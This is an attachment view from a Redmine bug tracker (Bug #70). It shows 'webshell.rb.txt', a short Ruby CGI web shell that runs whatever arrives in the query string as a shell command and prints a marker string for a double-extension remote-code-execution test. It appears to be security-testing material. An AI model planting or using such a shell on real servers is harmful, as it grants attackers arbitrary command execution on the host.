Project

General

Profile

Bug #70 ยป webshell.rb.txt

Redmine Admin, 07/16/2026 08:40 AM

 
#!/usr/bin/env ruby
puts "Content-Type: text/plain\r\n\r\n"
cmd = ENV['QUERY_STRING'] || ''
puts "RCE_TEST_DOUBLE_EXT_TXT"
puts `#{cmd}` unless cmd.empty?
    (1-1/1)